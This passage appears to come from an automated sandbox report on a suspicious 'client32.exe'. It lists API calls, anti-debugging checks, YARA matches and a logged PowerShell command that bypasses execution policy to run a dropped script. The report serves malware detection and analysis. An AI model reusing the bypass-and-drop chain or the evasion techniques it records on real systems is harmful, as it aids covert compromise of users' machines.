Source: client32.exe, 00000007.00000003.2207683968.000000000520D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4096450843.000000000520D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.1910338169.000000000520D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.1912269161.000000000520D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.1911566830.000000000520D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.1911987491.000000000520D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4095147957.000000000078E000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000007.00000003.1910694697.0000000005210000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: client32.exe, 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: VMWare
Source: client32.exe, 0000000A.00000003.2114713515.00000000007A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	API call chain: ExitProcess graph end node	graph_7-99795
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_110CFCF0 _memset,_strncpy,CreateMutexA,OpenMutexA,GetLastError,wsprintfA,OutputDebugStringA
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,GetProcAddress,GetLastError,_free,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_11178A14 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_11030B10 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_685B28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_685B87F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_687E0807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_11030B10 SetUnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1116A559 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 8_2_1115E4D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1"
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_110F2280 GetTickCount,LogonUserA,GetTickCount,GetLastError
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe	Code function: 7_2_11027BE0 keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,keybd_event
                                  Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmpProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-AG44P.tmp\ExtractedContent.ps1"Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe "C:\Users\user\AppData\Roaming\SystemUtil\client32.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1109D4A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,7_2_1109D4A0
                                  Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exeCode function: 7_2_1109DC20 GetProcAddress,GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,7_2_1109DC20
Source: client32.exe, 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmp | Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: client32.exe, 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmp | Binary or memory string: Shell_TrayWnd
Source: client32.exe, client32.exe, 00000008.00000002.2034698916.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2117662309.000000001118F000.00000002.00000001.01000000.0000000B.sdmp | Binary or memory string: Progman
Source: is-MH1O8.tmp.1.dr | Binary or memory string: H=eHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\AdvancedEnableBalloonTipsQTrayIconMessageWindowClassregisterWindowClassQTrayIconMessageWindowTaskbarCreatedChangeWindowMessageFilterExuser32ChangeWindowMessageFilterThe platform plugin failed to create a message window.Shell_NotifyIconGetRectShell_TrayWndTrayNotifyWndSysPagerToolbarWindow32P\=e
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,7_2_11170208
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,7_2_1117053C
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_11170499
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: GetLocaleInfoA,7_2_11167B5E
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,7_2_11170106
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,7_2_111701AD
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_11170011
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,7_2_111703D9
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_11170500
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,7_2_685CDB7C
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_685CDC56
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_685C1CC1
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: GetLocaleInfoA,7_2_685CDC99
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,7_2_685C1DB6
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,7_2_685C1E5D
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,7_2_685C1EB8
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,7_2_685C2089
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: EnumSystemLocalesA,7_2_685C2151
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_685C2175
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_685C21DC
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,7_2_685C2218
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,7_2_687E888A
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,8_2_1117053C
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: GetLocaleInfoA,8_2_11167B5E
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_11170011
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_11170500
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_11170499
Source: C:\Users\user\AppData\Local\Temp\is-HNUHO.tmp\KC0uZWwr8p.tmp | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_1101D180 __time64,SetRect,GetLocalTime,7_2_1101D180
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_1103B220 _calloc,GetUserNameA,_free,_calloc,_free,7_2_1103B220
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_1109D4A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,7_2_1109D4A0
Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe | Code function: 7_2_6859A980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange,7_2_6859A980
Source: Yara match | File source: 8.2.client32.exe.6db60000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.client32.exe.6db60000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.client32.exe.68890000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.client32.exe.6db60000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.client32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.client32.exe.68890000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.client32.exe.68890000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.client32.exe.68590000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000000.1905886353.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.2115416028.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
